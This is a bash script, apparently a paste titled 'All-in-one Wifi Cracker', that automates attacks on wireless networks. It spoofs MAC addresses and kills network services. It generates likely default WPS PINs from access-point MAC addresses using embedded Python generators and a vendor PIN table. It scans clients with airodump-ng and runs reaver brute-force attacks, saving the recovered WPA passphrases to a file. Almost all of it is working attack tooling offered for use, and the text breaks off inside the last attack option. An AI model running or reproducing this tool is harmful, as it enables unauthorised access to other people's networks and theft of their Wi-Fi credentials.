
All-in-one Wifi Cracker

a guest
Jan 6th, 2015
  1. #!/bin/bash
  2.  
  3.  
  4.  
  # Terminal escape sequences used to colour the menus, captured once from tput.
  # STAND resets all attributes; the colours are emitted together with bold.
  # BLUE is terminfo colour 6, which standard palettes render as cyan.
  STAND=$(tput sgr0)
  RED=$(if tput setaf 1; then tput bold; fi)
  GREEN=$(if tput setaf 2; then tput bold; fi)
  BLUE=$(if tput setaf 6; then tput bold; fi)
  9.  
  10. while :
  11. do
  12.  
  13. ###### Create scrypta storage folder if it doesn't exist ######
  14.  
  15. if [ -d $HOME/scrypta ];
  16. then
  17. echo ""
  18. else
  19. mkdir $HOME/scrypta
  20. mkdir $HOME/scrypta/temp
  21. mkdir $HOME/scrypta/Captured_Handshakes
  22. mkdir $HOME/scrypta/Client_Scans
  23. fi
  24.  
  25. ###### Delete Missed Files In The Temp Directory ######
  26.  
  27. rm $HOME/scrypta/temp/*.txt &> /dev/null
  28. rm $HOME/scrypta/temp/*.py &> /dev/null
  29. rm $HOME/scrypta/temp/*.ivs &> /dev/null
  30. rm $HOME/scrypta/temp/*.cap &> /dev/null
  31. rm $HOME/scrypta/temp/*.xor &> /dev/null
  32. rm $HOME/scrypta/temp/*.csv &> /dev/null
  33. rm $HOME/scrypta/temp/*.netxml &> /dev/null
  34. rm $HOME/scrypta/temp/arp-packet &> /dev/null
  35. rm $HOME/scrypta/temp/*.sh &> /dev/null
  36.  
  37. ###### START OF: DETECT mon0 MAC ADDRESS AND THEN DISPLAY SYSTEM MODE STATUS ######
  38.  
  39. mon0mac=$(ip addr | grep "radiotap" | cut -c 30-46)
  40.  
  41. if [ -s $mon0mac ]
  42. then
  43. MonitorModeStatus=$(echo Networking Mode Enabled)
  44. else
  45. MonitorModeStatus=$(echo Attack Mode Enabled)
  46. fi
  47.  
  48. ###### System Environment Options Menu ######
  49. clear
  50. echo $RED"#########################################"
  51. echo "# $STAND scrypta $RED#"
  52. echo "#########################################"
  53. echo "# #"
  54. echo "#$GREEN [1]$BLUE WiFi Adapter Selection $RED#"
  55. echo "#$GREEN [2]$BLUE Enable Attack Or Networking Mode $RED#"
  56. echo "#$GREEN [3]$BLUE Attack A WPS Enabled Access Point $RED#"
  57. echo "#$GREEN [4]$BLUE Capture WPA/WPA2 Handshake $RED#"
  58. echo "#$GREEN [5]$BLUE WEP Attacks $RED#"
  59. echo "#$GREEN [6]$BLUE Attack Handshake.cap Files $RED#"
  60. echo "#$GREEN [7]$BLUE Show Recovered Passkeys $RED#"
  61. echo "#$GREEN [8]$BLUE Recovered Passkey Checker $RED#"
  62. echo "# #"
  63. echo "#########################################"
  64. echo ""
  65. echo "Chosen Interface$STAND: $wlanX"
  66. echo $RED"System Mode$STAND: $MonitorModeStatus"
  67. echo $RED"MAC address for mon0$STAND: $mon0mac"
  68. echo ""
  69. read -s -n1 -p $GREEN"Please choose an option?$STAND: " ChosenOption
  70. echo
  71. case $ChosenOption in
  72.  
  73. 1)
  74. ###### [1] START OF: CHOOSE A WIFI ADAPTER ######
  75.  
  76. cd $HOME/scrypta/temp
  77. clear
  78. Presented_WiFi_Adapters=$(airmon-ng | grep "wlan" | cut -c 1-5 | nl -ba -w 1 -s ": ")
  79. clear
  80. echo $RED"Available WiFi Adapters.$STAND"
  81. echo ""
  82. echo "$Presented_WiFi_Adapters"
  83. echo ""
  84. read -s -n1 -p $GREEN"Please input the number of your chosen WiFi adapter:$STAND " grep_Line_Number
  85. wlanX=$(echo $Presented_WiFi_Adapters | sed -n ""$grep_Line_Number"p" | cut -c 4-8)
  86. echo ""
  87. echo ""
  88. echo $RED"You've chosen:$STAND $wlanX"
  89. sleep 1
  90. cd
  91.  
  92. ;;
  93.  
  94. ###### [1] END OF: CHOOSE A WIFI ADAPTER ######
  95.  
  96. 2)
  97. ###### [2] START OF: ENABLE NETWORKING OR ATTACK MODE ######
  98.  
  99. clear
  100. echo $RED"#########################################"
  101. echo "# #"
  102. echo "# $GREEN[1]$BLUE Enable Networking Mode $RED #"
  103. echo "# $GREEN[2]$BLUE Enable Attack Mode $RED #"
  104. echo "# $GREEN[0]$BLUE Return To Main Menu $RED #"
  105. echo "# #"
  106. echo "#########################################$STAND"
  107. echo ""
  108. read -s -n1 -p $GREEN"Choose an option, 1 or 2?:$STAND " option
  109. if [[ $option == "1" ]]; then
  110. clear
  111. echo $RED"Putting the system into networking mode$STAND"
  112. airmon-ng stop mon5 > /dev/null
  113. airmon-ng stop mon4 > /dev/null
  114. airmon-ng stop mon3 > /dev/null
  115. airmon-ng stop mon2 > /dev/null
  116. airmon-ng stop mon1 > /dev/null
  117. airmon-ng stop mon0 > /dev/null
  118. airmon-ng stop wlanX
  119. echo $RED"Please wait...$STAND"
  120. ifconfig $wlanX down
  121. ifconfig $wlanX down
  122. wlanFakeMAC=$(macchanger -r $wlanX | grep "New" | cut -c 16-32)
  123. ifconfig $wlanX hw ether $wlanFakeMAC
  124. ifconfig $wlanX up
  125. sleep 1
  126. service network-manager start
  127. echo ""
  128. echo $RED"Networking mode should now be enabled, A fake MAC address has also been set.$STAND"
  129. sleep 3
  130. fi
  131.  
  132. if [[ $option == "2" ]]; then
  133. clear
  134. echo $RED"Putting the system into attack mode$STAND"
  135. echo $RED"Please wait...$STAND"
  136. echo ""
  137. airmon-ng stop mon5 > /dev/null
  138. airmon-ng stop mon4 > /dev/null
  139. airmon-ng stop mon3 > /dev/null
  140. airmon-ng stop mon2 > /dev/null
  141. airmon-ng stop mon1 > /dev/null
  142. airmon-ng stop mon0 > /dev/null
  143. ifconfig $wlanX down
  144.  
  145. read -s -n1 -p $GREEN"Would you like to disable processes that might cause issue's Y/n?.$STAND " KillProcesses
  146. if [[ $KillProcesses == "Y" || $KillProcesses == "y" ]]; then
  147. echo ""
  148. echo $RED"Please wait...$STAND"
  149. kill `pidof NetworkManager`
  150. sleep 2
  151. kill `pidof wpa_supplicant`
  152. sleep 2
  153. fi
  154.  
  155. ifconfig $wlanX up
  156. sleep 1
  157. airmon-ng start $wlanX
  158. echo $RED"Please wait...$STAND"
  159. sleep 1
  160. ifconfig $wlanX down
  161. sleep 1
  162. ifconfig mon0 down
  163. wlanMAC1=$(macchanger -r $wlanX | grep "New" | cut -c 16-32)
  164. ifconfig $wlanX hw ether $wlanMAC1
  165. echo ""
  166. sleep 1
  167. macchanger --mac $wlanMAC1 mon0 > /dev/null
  168. ifconfig $wlanX up
  169. ifconfig mon0 up
  170. echo ""
  171. echo $RED"MAC address for $wlanX:$STAND"
  172. macchanger -s $wlanX
  173. echo ""
  174. echo $RED"MAC address for mon0:$STAND"
  175. macchanger -s mon0
  176. echo ""
  177. echo $RED"A Random MAC address has been set,$STAND "$wlanX"$RED and$STAND mon0$RED should now have the same fake MAC address.$STAND"
  178. echo ""
  179. echo $RED"Attack Mode Should Now Be Enabled.$STAND"
  180. sleep 3
  181. fi
  182.  
  183. ;;
  184.  
  185. ###### [2] END OF: ENABLE NETWORKING OR ATTACK MODE ######
  186.  
  187. 3)
  188. ###### [3] Attack A WPS Enabled Access Point ######
  189. cd $HOME/scrypta/temp
  190. clear
  191. ############## Start Of Create WPSpin.py And easybox_wps.py ##############
  192.  
  193. ############## WPSpin.py ##############
  194. echo '
  195. import sys
  196.  
  197. VERSION = 1
  198. SUBVERSION = 0
  199.  
  200. def usage():
  201. print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
  202. print "[*] Usage : python WPSpin.py 123456"
  203. sys.exit(0)
  204.  
  205. def wps_pin_checksum(pin):
  206. accum = 0
  207.  
  208. while(pin):
  209. accum += 3 * (pin % 10)
  210. pin /= 10
  211. accum += pin % 10
  212. pin /= 10
  213. return (10 - accum % 10) % 10
  214.  
  215. try:
  216. if (len(sys.argv[1]) == 6):
  217. p = int(sys.argv[1] , 16) % 10000000
  218. print "[+] WPS pin might be : %07d%d" % (p, wps_pin_checksum(p))
  219. else:
  220. usage()
  221. except Exception:
  222. usage()
  223. ' > WPSpin.py
  224.  
  225. ############## easybox_wps.py ##############
  226.  
  227. echo '#!/usr/bin/env python
  228. import sys, re
  229.  
  230. def gen_pin (mac_str, sn):
  231. mac_int = [int(x, 16) for x in mac_str]
  232. sn_int = [0]*5+[int(x) for x in sn[5:]]
  233. hpin = [0] * 7
  234.  
  235. k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF
  236. k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF
  237. hpin[0] = k1 ^ sn_int[9];
  238. hpin[1] = k1 ^ sn_int[8];
  239. hpin[2] = k2 ^ mac_int[9];
  240. hpin[3] = k2 ^ mac_int[10];
  241. hpin[4] = mac_int[10] ^ sn_int[9];
  242. hpin[5] = mac_int[11] ^ sn_int[8];
  243. hpin[6] = k1 ^ sn_int[7];
  244. pin = int("%1X%1X%1X%1X%1X%1X%1X" % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5], hpin[6]), 16) % 10000000
  245.  
  246. # WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or
  247. # http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc
  248. accum = 0
  249. t = pin
  250. while (t):
  251. accum += 3 * (t % 10)
  252. t /= 10
  253. accum += t % 10
  254. t /= 10
  255. return "%i%i" % (pin, (10 - accum % 10) % 10)
  256.  
  257. def main():
  258. if len(sys.argv) != 2:
  259. sys.exit("usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n")
  260.  
  261. mac_str = re.sub(r"[^a-fA-F0-9]", "", sys.argv[1])
  262. if len(mac_str) != 12:
  263. sys.exit("check MAC format!\n")
  264.  
  265. sn = "R----%05i" % int(mac_str[8:12], 16)
  266. print "derived serial number:", sn
  267. print "SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c" % (mac_str[6], mac_str[7], mac_str[8], mac_str[9], sn[5], sn[9])
  268. print "WPS pin:", gen_pin(mac_str, sn)
  269.  
  270. if __name__ == "__main__":
  271. main()
  272. ' > easybox_wps.py
  273.  
  274. ############## End Of Create WPSpin.py And easybox_wps.py ##############
  275.  
  276. ############## Start Of Target Selection And Pin Generation ##############
  277.  
  278. clear
  279. echo $RED"Scanning for WPS-enabled access points, press Ctrl+c on the wash screen to stop the scan and choose a target."$STAND
  280. read -p $GREEN"Press [Enter] to launch the scan.$STAND"
  281. xterm -geometry 111x24+650+0 -l -lf WashScan.txt -e wash -i mon0
  282. sed -i ''1,6d';'$d'' WashScan.txt
  283.  
  284. ############## Start Of Loop Section ##############
  285.  
  286. while true
  287. do
  288.  
  289. Presented_APs=$(cat WashScan.txt | awk '{ print $6 }' | nl -ba -w 1 -s ': ' | sed '$d')
  290. clear
  291. echo $RED"Available Access Points."$STAND
  292. echo ""
  293. echo "$Presented_APs"
  294. echo ""
  295. read -p $GREEN"Please input the number of your chosen target:$STAND " grep_AP_line_number
  296.  
  297. Chosen_AP_Line=$(cat WashScan.txt | sed -n ""$grep_AP_line_number"p")
  298. AP_essid=$(echo $Chosen_AP_Line | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
  299. AP_bssid=$(echo $Chosen_AP_Line | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
  300. AP_channel=$(echo $Chosen_AP_Line | awk '{ print $2 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
  301. PinMAC1=$(echo $AP_bssid | sed 's/://g' | cut -c 7-12)
  302. PinMAC2=$(echo $AP_bssid | sed 's/://g' | cut -c 1-6)
  303. WPSpin1=`python WPSpin.py $PinMAC1 | awk '{ print $7 }'`
  304. WPSpin2=`python WPSpin.py $PinMAC2 | awk '{ print $7 }'`
  305. easybox=`python easybox_wps.py $AP_bssid | grep "WPS pin" | cut -c 10-17`
  306.  
  307. ############## End Of Target Selection And Pin Generation ##############
  308.  
  309. ############## Start Of Choose A MAC Address Options ##############
  310.  
  311. clear
  312. echo $RED"Please choose a MAC address option:$STAND"
  313. echo $GREEN"[1]$BLUE = Auto Set A Random MAC address.$STAND"
  314. echo $GREEN"[2]$BLUE = Input Any MAC Address You Want To Use.$STAND"
  315. echo $GREEN"[3]$BLUE = Continue Without Changing The MAC Address.$STAND"
  316. read -s -n1 -p $GREEN"Please choose 1, 2, or 3?$STAND: " option
  317.  
  318. if [[ $option == "1" ]]; then
  319. clear
  320. echo $RED"Auto Setting A Random MAC Address.$STAND"
  321. echo $RED"Please wait..."$STAND
  322. ifconfig $wlanX down
  323. ifconfig $wlanX down
  324. sleep 1
  325. ifconfig mon0 down
  326. wlanMAC2=`macchanger -r $wlanX | grep "New" | cut -c 16-32`
  327. ifconfig $wlanX hw ether $wlanMAC2
  328. echo ""
  329. sleep 1
  330. macchanger --mac $wlanMAC2 mon0
  331. ifconfig $wlanX up
  332. ifconfig mon0 up
  333. echo ""
  334. echo $RED"MAC address for$STAND $wlanX:"
  335. macchanger -s $wlanX
  336. echo ""
  337. echo $RED"MAC address for$STAND mon0:"
  338. macchanger -s mon0
  339. echo ""
  340. echo $RED"A Random MAC address has been set,$STAND $wlanX$RED and$STAND mon0$RED should now have the same fake MAC address."
  341. echo ""
  342. sleep 4
  343. fi
  344.  
  345. if [[ $option == "2" ]]; then
  346. clear
  347. echo $RED"Set A User specified MAC Address.$STAND"
  348. echo $RED"Please wait..."$STAND
  349. ifconfig $wlanX down
  350. ifconfig mon0 down
  351. echo ""
  352. echo $RED"Setting a random MAC address."$STAND
  353. macchanger -r $wlanX
  354. echo ""
  355. read -p $GREEN"Input any mac address you want to use?.$STAND " SpecifiedInterfaceMAC
  356. ifconfig $wlanX hw ether $SpecifiedInterfaceMAC
  357. macchanger --mac $SpecifiedInterfaceMAC mon0
  358. ifconfig $wlanX up
  359. ifconfig mon0 up
  360. echo ""
  361. echo $RED"MAC address for$STAND $wlanX:"$STAND
  362. macchanger -s $wlanX
  363. echo ""
  364. echo $RED"MAC address for$STAND mon0:"$STAND
  365. macchanger -s mon0
  366. echo ""
  367. sleep 2
  368. echo $RED"A User specified MAC Address has been set, $wlanX and $monX should now have the same fake MAC address."$STAND
  369. echo ""
  370. echo $RED"Attack Mode Should Now Be Enabled."$STAND
  371. sleep 2
  372. fi
  373.  
  374. if [[ $option == "3" ]]; then
  375. echo ""
  376. fi
  377.  
  378. ############## End Of Choose A MAC Address Options ##############
  379.  
  380. ############## Start Of Review Information ##############
  381.  
  382. clear
  383. echo $RED"Review Information."$STAND
  384. echo ""
  385. echo $RED"You've chosen$BLUE essid$RED:$STAND $AP_essid"
  386. echo $RED"You've chosen$BLUE bssid$RED:$STAND $AP_bssid"
  387. echo $RED"You've chosen$BLUE Channel$RED:$STAND $AP_channel"
  388. echo ""
  389. echo $RED"Possible$BLUE WPS Pin1$RED:$STAND $WPSpin1"
  390. echo $RED"Possible$BLUE WPS Pin2$RED:$STAND $WPSpin2"
  391. echo $RED"Possible$BLUE easybox Pin$RED:$STAND $easybox"
  392. ############## Start Of WPSPIN-1.3 Default Pin Generator ##############
  393.  
  394. ESSID=$(echo $AP_essid)
  395. BSSID=$(echo $AP_bssid)
  396.  
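  #######################################
  # Append a check digit to the global PIN and re-verify the result.
  #
  # The digits above the units place are summed with alternating weights
  # 3,1,3,1,3,1,3 (most significant first, starting at the 10^7 place); the
  # check digit is (10 - sum % 10) % 10 and is added to PIN. A second pass
  # then sums all eight digits (units place weighted 1) so RESTE can be used
  # to confirm the final value is self-consistent.
  #
  # Globals:
  #   PIN      (read/written) decimal number whose units digit is a
  #            placeholder; the visible callers pass 10 * <value>.
  #   ACCUM    (written) weighted digit sum of the final PIN.
  #   DIGIT    (written) first-pass weighted sum modulo 10.
  #   CHECKSUM (written) the check digit that was added to PIN.
  #   RESTE    (written) ACCUM modulo 10; 0 when the check digit is valid.
  # Arguments: none
  # Returns:   0 on success, 1 if PIN is not a plain decimal number.
  #######################################
  FUNC_CHECKSUM(){
    local pin_value divisor weight

    # Reject anything that is not purely decimal instead of letting the
    # arithmetic below fail part-way through and leave the globals half-set.
    if [[ ! ${PIN:-0} =~ ^[0-9]+$ ]]; then
      printf 'FUNC_CHECKSUM: PIN is not a decimal number: %s\n' "$PIN" >&2
      return 1
    fi

    # Force base 10 so a value with leading zeros is not read as octal.
    pin_value=$(( 10#${PIN:-0} ))

    # First pass: seven weighted digits, units place excluded.
    ACCUM=0
    weight=3
    for (( divisor = 10000000; divisor >= 10; divisor /= 10 )); do
      ACCUM=$(( ACCUM + weight * ( (pin_value / divisor) % 10 ) ))
      weight=$(( 4 - weight ))   # alternate 3 -> 1 -> 3 ...
    done

    DIGIT=$(( ACCUM % 10 ))
    CHECKSUM=$(( (10 - DIGIT) % 10 ))
    PIN=$(( pin_value + CHECKSUM ))

    # Second pass: all eight digits, including the check digit just added.
    ACCUM=0
    weight=3
    for (( divisor = 10000000; divisor >= 1; divisor /= 10 )); do
      ACCUM=$(( ACCUM + weight * ( (PIN / divisor) % 10 ) ))
      weight=$(( 4 - weight ))
    done

    RESTE=$(( ACCUM % 10 ))
  }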
  425.  
  426. CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':')
  427.  
  428. FINBSSID=$(echo $BSSID | cut -d ':' -f4-)
  429.  
  430. MAC=$(echo $FINBSSID | tr -d ':')
  431.  
  432. CONVERTEDMAC=$(printf '%d\n' 0x$MAC)
  433.  
  434. FINESSID=$(echo $ESSID | cut -d '-' -f2)
  435.  
  436. PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':')
  437.  
  438. CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':')
  439.  
  440. MACESSID=$(echo $PAREMAC$FINESSID)
  441.  
  442. STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`
  443.  
  444. PIN=`expr 10 '*' $STRING`
  445.  
  446. FUNC_CHECKSUM
  447.  
  448. PINWPS1=$(printf '%08d\n' $PIN)
  449.  
  450. STRING2=`expr $STRING '+' 8`
  451. PIN=`expr 10 '*' $STRING2`
  452.  
  453. FUNC_CHECKSUM
  454.  
  455. PINWPS2=$(printf '%08d\n' $PIN)
  456.  
  457. STRING3=`expr $STRING '+' 14`
  458. PIN=`expr 10 '*' $STRING3`
  459.  
  460. FUNC_CHECKSUM
  461.  
  462. PINWPS3=$(printf '%08d\n' $PIN)
  463.  
  464. if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] && [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] && [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];
  465.  
  466. then
  467.  
  468. CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID)
  469.  
  470. RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'`
  471.  
  472. STRING4=`expr $RAIZ '+' 7`
  473.  
  474. PIN=`expr 10 '*' $STRING4`
  475.  
  476. FUNC_CHECKSUM
  477.  
  478. PINWPS4=$(printf '%08d\n' $PIN)
  479.  
  480. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS4 "
  481. PIN4REAVER=$PINWPS4
  482. else
  483. case $CHECKBSSID in
  484. 04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0)
  485. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1
  486. $RED"Other Possible Pin"$RED:$STAND $PINWPS2
  487. $RED"Other Possible Pin"$RED:$STAND $PINWPS3"
  488. PIN4REAVER=$PINWPS1
  489. ;;
  490. 001915)
  491. echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
  492. PIN4REAVER=12345670
  493. ;;
  494. 404A03)
  495. echo -e "$RED"Other Possible Pin"$RED:$STAND 11866428"
  496. PIN4REAVER=11866428
  497. ;;
  498. F43E61 | 001FA4)
  499. echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
  500. PIN4REAVER=12345670
  501. ;;
  502. 001A2B)
  503. if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]];
  504. then
  505. echo -e "$RED"Other Possible Pin"$RED:$STAND 88478760"
  506. PIN4REAVER=88478760
  507. else
  508. echo -e "PIN POSSIBLE... > $PINWPS1"
  509. PIN4REAVER=$PINWPS1
  510. fi
  511. ;;
  512. 3872C0)
  513. if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]];
  514. then
  515. echo -e "$RED"Other Possible Pin"$RED:$STAND 18836486"
  516. PIN4REAVER=18836486
  517. else
  518. echo -e "PIN POSSIBLE > $PINWPS1"
  519. PIN4REAVER=$PINWPS1
  520. fi
  521. ;;
  522. FCF528)
  523. echo -e "$RED"Other Possible Pin"$RED:$STAND 20329761"
  524. PIN4REAVER= 20329761
  525. ;;
  526. 3039F2)
  527. echo -e "several possible PINs, ranked in order>
  528. 16538061 16702738 18355604 88202907 73767053 43297917"
  529. PIN4REAVER=16538061
  530. ;;
  531. A4526F)
  532. echo -e "several possible PINs, ranked in order>
  533. 16538061 88202907 73767053 16702738 43297917 18355604 "
  534. PIN4REAVER=16538061
  535. ;;
  536. 74888B)
  537. echo -e "several possible PINs, ranked in order>
  538. 43297917 73767053 88202907 16538061 16702738 18355604"
  539. PIN4REAVER=43297917
  540. ;;
  541. DC0B1A)
  542. echo -e "several possible PINs, ranked in order>
  543. 16538061 16702738 18355604 88202907 73767053 43297917"
  544. PIN4REAVER=16538061
  545. ;;
  546. 5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4)
  547. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 "
  548. PIN4REAVER=$PINWPS1
  549. ;;
  550. 002275)
  551. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  552. PIN4REAVER=$PINWPS1
  553. ;;
  554. 08863B)
  555. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  556. PIN4REAVER=$PINWPS1
  557. ;;
  558. 001CDF)
  559. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  560. PIN4REAVER=$PINWPS1
  561. ;;
  562. 00A026)
  563. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  564. PIN4REAVER=$PINWPS1
  565. ;;
  566. 5057F0)
  567. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  568. PIN4REAVER=$PINWPS1
  569. ;;
  570. C83A35 | 00B00C | 081075)
  571. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  572. PIN4REAVER=$PINWPS1
  573. ;;
  574. E47CF9 | 801F02)
  575. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  576. PIN4REAVER=$PINWPS1
  577. ;;
  578. 0022F7)
  579. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  580. PIN4REAVER=$PINWPS1
  581. ;;
  582. *)
  583. echo -e $RED"Other Possible Pin$RED:$STAND $PINWPS1"
  584. PIN4REAVER=$PINWPS1
  585. ;;
  586. esac
  587. fi
  588.  
  589. ############## End Of WPSPIN-1.3 Default Pin Generator ##############
  590.  
  591. echo ""
  592. echo $RED"MAC address for$STAND mon0:"$STAND
  593. macchanger -s mon0
  594. sleep 4
  595.  
  596. ############## End Of Review Information ##############
  597.  
  598. ############## Start Of Scan For Clients And Store Collected MAC Addresses Option ##############
  599. echo ""
  600. read -s -n1 -p $GREEN"Would you like to scan for clients connected to the target access point? Y/n:$STAND " ClientScan
  601.  
  602. if [[ $ClientScan == "Y" || $ClientScan == "y" ]]; then
  603. xterm -geometry 111x24+650+0 -l -lf temp1.txt -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
  604. cat temp1.txt | tail -10 | sed 'N;$!P;$!D;$d' | sed -n '/STATION/,$p' >> ClientScan-$AP_bssid.txt
  605. mv ClientScan-$AP_bssid.txt $HOME/scrypta/Client_Scans/ClientScan-$AP_bssid.txt
  606. rm temp1.txt
  607. echo ""
  608. echo ""
  609. echo $RED"Collected scan data is stored in$STAND ClientScan-$AP_bssid.txt $RED Location$STAND: $HOME/scrypta/Client_Scans"
  610. echo ""
  611. read -p $GREEN"Press [Enter] to continue.$STAND"
  612. fi
  613.  
  614. if [[ $ClientScan == "N" || $ClientScan == "n" ]]; then
  615. echo ""
  616. fi
  617. ############## End Of Scan For Clients And Store Collected MAC Addresses Option ##############
  618.  
  619. ############## Start Of Reaver Attacks And Store Recovered Passkey ##############
  620.  
  621. clear
  622. echo $RED"Choose an attack option:"$STAND
  623. echo $GREEN"[1]$BLUE = Reaver + Auto Generated WPS Pin"$STAND
  624. echo $GREEN"[2]$BLUE = Reaver (Customisable Options)"$STAND
  625. echo
  626. read -s -n1 -p $GREEN"Please choose an option?$STAND: " yourch
  627. echo
  628. case $yourch in
  629.  
  630. 1)
  631. clear
  632. echo $RED"Choose a pin:"
  633. echo $GREEN"[1]$BLUE WPS Pin1 = $WPSpin1"
  634. echo $GREEN"[2]$BLUE WPS Pin2 = $WPSpin2"
  635. echo $GREEN"[3]$BLUE EasyBox Pin = $easybox"
  636. echo $GREEN"[4]$BLUE Other Pins = $PIN4REAVER"
  637. read -s -n1 -p $GREEN"Please choose 1, 2, 3, or 4?$STAND: " PinOption
  638.  
  639. if [[ $PinOption == "1" ]]; then
  640. clear
  641. echo $RED"Reaver Attack Command:"$STAND
  642. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin1 -d 2 -t 2 -T 2 -vv"
  643. echo ""
  644. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  645. clear
  646. reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin1 -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  647. rm reaver.txt
  648. echo ""
  649. fi
  650.  
  651. if [[ $PinOption == "2" ]]; then
  652. clear
  653. echo $RED"Reaver Attack Command:"$STAND
  654. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin2 -d 2 -t 2 -T 2 -vv"
  655. echo ""
  656. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  657. clear
  658. reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin2 -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  659. rm reaver.txt
  660. echo ""
  661. fi
  662.  
  663. if [[ $PinOption == "3" ]]; then
  664. clear
  665. echo $RED"Reaver Attack Command:"$STAND
  666. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $easybox -d 2 -t 2 -T 2 -vv"
  667. echo ""
  668. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  669. clear
  670. reaver -i mon0 -c $AP_channel -b $AP_bssid -p $easybox -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  671. rm reaver.txt
  672. echo ""
  673. fi
  674.  
  675. if [[ $PinOption == "4" ]]; then
  676. clear
  677. echo $RED"Reaver Attack Command:"$STAND
  678. echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $PIN4REAVER -d 2 -t 2 -T 2 -vv"
  679. echo ""
  680. read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  681. clear
